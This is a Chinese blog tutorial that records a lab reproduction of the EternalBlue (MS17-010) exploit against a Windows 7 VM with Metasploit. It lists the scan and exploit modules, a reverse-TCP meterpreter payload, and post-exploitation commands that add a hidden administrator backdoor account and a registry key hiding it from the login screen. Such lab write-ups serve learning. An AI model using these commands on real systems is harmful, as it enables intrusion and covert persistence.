文章目录

  • 前言
  • 一:基础知识介绍
  • 二、实验环境
  • 三、实验步骤
  • 总结

前言

学习Metasploit的时候就听说了经典的永恒之蓝漏洞,所以自己试验了一次,借此作个记录。


一:基础知识介绍

1.何为永恒之蓝?

    永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.什么是SMB协议?

    SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

3.SMB工作原理是什么?

 (1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。(2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。(3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。(4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。</font>

二、实验环境

kali2、win7sp1靶机
关闭win7的防火墙,然后将kali和win7的网络模式都换为桥接模式。

三、实验步骤

1.打开kali2、win7靶机,先查看一下kali的ip地址(ifconfig)

数据库配置:
1)查看本机数据库是否开启

命令:service postgresql status

2)打开本机数据库

命令:service postgresql start

service postgresql status

3)进行msfdb初始化,配置数据库连接密码等信息。

命令:msfdb init

接下来打开zenmap(nmap的可视化界面),强烈推荐使用,方便简单。 因为将kali和win7都调为桥接模式,所以扫描192.168.31.193/24 整个网段即可找到win7的ip地址和其的一些基本信息。


进行MS17_010漏洞扫描

启动msf : msfconsole

搜索ms17_010(永恒之蓝漏洞利用) :
使用 auxiliary/scanner/smb/smb_ms17_010 这个模块进行ms17_010漏洞扫描


使用options 查看需要设置的信息 :

1、设置扫描的主机或网段
(因为上面我们使用zenmap找到了我们需要攻击的win7虚拟机的ip地址,所以直接对这个ip进行漏洞扫描)

命令:set rhosts 192.168.31.252

2、设置扫描线程

命令:set threads 30

3、执行exploit命令进行扫描

发现了目标主机漏洞

利用MS17-010漏洞进行攻击

1、使用攻击模块

use exploit/windows/smb/ms17_010_eternalblue (上面search ms17_010漏洞时找到的攻击模块)

2、设置目标主机

set rhost 192.168.31.252(靶机)

3、设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

4、设定监听主机

set lhost 192.168.31.193(kali)

5、执行exploit命令进行攻击


可以看到监听IP及端口,攻击机与靶机之间成功建立会话
当出现meterpreter时即可说明已经成功攻击进入靶机

后渗透攻击 :

1、远程显示主机系统信息 :


2、查看用户身份 :
3、对远程主机当前屏幕进行截图:

保存在 /root目录下 然后进入主目录中查看即可看到靶机的界面截屏

4、获得shell控制并新建一个用户:

4.1 使用 net user a 123 /add 创建一个用户名为a,密码为123 的用户
4.2使用 net user 查看用户


可见我们的a用户创建完成

4.3将此用户加入本地管理员组(后门植入,获取更大的权限)。
net localgroup administrators a /add

可以看出确实将用户abc加入到了本地管理员组中去了:

利用永恒之蓝漏洞攻击只能针对win7及以下低版本未打ms17_010补丁的电脑,借此实现该漏洞帮助自己熟悉Metasploit的使用和部分命令的使用。


总结

命令的一些总结 :

新建用户: net user 用户名 密码/add (删除用户:net user 用户名/del)
net user abc abc /add (新建用户abc,密码abc)
查看用户 : net user
此时在net user中可以查看到新建的用户
net localgroup administrators //查看windows 7本地管理员

补充(自行实验) :

新建用户使使用net user无法查看
net user 用户名$ 密码 /add(在用户名后添加一个符号就OK)netuserzhangsan符号就OK) net user zhangsan符号就OK)netuserzhangsan 123 /add (创建zhangsan用户使其无法使用 net user来查看此用户)
看不到新创建的zhangsan用户。这个对进行后渗透测试时十分重要。可以通过创建一个隐秘的账号来以便下次进行登录。但是会在注册表和登录界面显示,可以使用命令将登录界面的用户名隐藏(下面会说到),但是不能隐藏注册表中的信息。

WINDOWS

在登录界面隐藏可登录用户
初始登录界面

隐藏用户administrator
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windowsNT\CurrentVersion\WinLogon\SpecialAccounts\UserList” /v 要隐藏的用户名 /T REG_DWORD /D 0

重启后便看不到隐藏的用户名 。

最后,安全之路:路途漫长,以后莫失莫忘。愿你不骄不躁,安稳顺心。

部分引用 :https://blog.csdn.net/qq_41976183/article/details/97961664

永恒之蓝ms17_010漏洞利用攻击相关推荐

  1. 永恒之蓝ms17-010漏洞利用复现

    一.永恒之蓝简述: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...

  2. MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法

    MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝 ...

  3. metasploit实战-ms17-010(永恒之蓝)漏洞利用与复现

    本文目录 永恒之蓝概述 实验环境 实验过程 第一步:扫描漏洞 第二步:渗透攻击 第三步:漏洞利用 截屏 永恒之蓝概述 ms17-010(永恒之蓝)漏洞是由Shadow Brokers(影子经纪人)在2 ...

  4. 永恒之蓝 ms17_010漏洞

    复现环境: 攻击机:Linux kali(192.168.119.128) 靶机:Windows 7 x64(192.168.119.129) 实验条件:两台机子可以相互ping通,并且靶机(无补丁) ...

  5. 永恒之蓝MS17-010漏洞利用 writeup

    MS17-010漏洞: MS17-010漏洞: • 一. MS17-010漏洞公告及相关分析报告 •二.漏洞重现 •漏洞利用防范 • 一. MS17-010漏洞公告及相关分析报告 ★MS17_010 ...

  6. 永恒之蓝ms17_010漏洞

    复现环境: 1.攻击机:kali2022(192.168.1.50) 2.靶机:win7 enterprise(192.168.1.55) 关闭靶机win7防火墙 两台虚拟机已经互相ping通 1.探 ...

  7. 永恒之蓝ms17_010漏洞复现

    1.复现准备 攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互pin ...

  8. ms17-010(永恒之蓝)漏洞利用

    kali利用ms17-010获取win7权限 环境介绍 利用过程 总结 环境介绍 攻击机:kali(ip:192.168.133.136) 靶机:win7(ip:192.168.133.138) 靶机 ...

  9. 永恒之蓝(EternalBlue)漏洞利用实例

    1.升级kali-rolling a.修改更新源 vim /etc/apt/sources.list,只保留官方更新源"deb http://http.kali.org/kali kali- ...

最新文章

  1. 自动检索、修复Python代码bug,微软推出DeepDebug
  2. 修改telnet提示并非_俊翔:修改ECU数据解除奔驰GL350尿素限制
  3. Pro Android学习笔记(三三):Menu(4):Alternative菜单
  4. 川渝严重高温伏旱根源:全球气候变暖导致灾情频发
  5. mysql初级知识梳理与练习
  6. 成也标签败也标签--真实的模型案例分享
  7. javascript 容错处理代码(屏蔽js错误)
  8. python自定义一个可迭代类_python进阶之自定义可迭代的类
  9. python内置的字典dict中元素_Python内置字典;dict ,set
  10. 需求分析报告模板(免费)
  11. java poi excel 图表_Java用POI实现根据Excel表格模板生成新的Excel并实现数据输出
  12. 微星GS安装Ubuntu系统
  13. jojo第七部dio怎么复活_不是很懂第七部DIO爷是怎么死的
  14. 如何使用poi在word表格中新增行的4种方法
  15. 7654劫持火狐解决办法
  16. 阿里暑期实习生面试经验-数据分析岗位
  17. 英语单词词性顺口溜_巧记英语单词的顺口溜 这样记忆不枯燥
  18. 方根法公式_初中数学根式运算法则公式
  19. 如何快速转行做产品经理
  20. 【大数据开发】Python基础——Python序列

热门文章

  1. 新增10所高校获批虚拟现实技术本科专业,中国市场将超千亿
  2. HBase学习(四) HBase API操作
  3. 电脑如何打开虚拟化设置?
  4. 计算机的操作系统是什么与什么的接口,计算机中操作系统是什么的接口
  5. 前端面试问题答案汇总--基础版
  6. 【小程序测试】小程序介绍,项目简介
  7. van-field 校验手机号码格式
  8. 计算机网络复习(部分)
  9. linux服务器怎么刻录光盘,Ubuntu 下使用K3B软件刻录光盘(图)
  10. Swift表格Lxr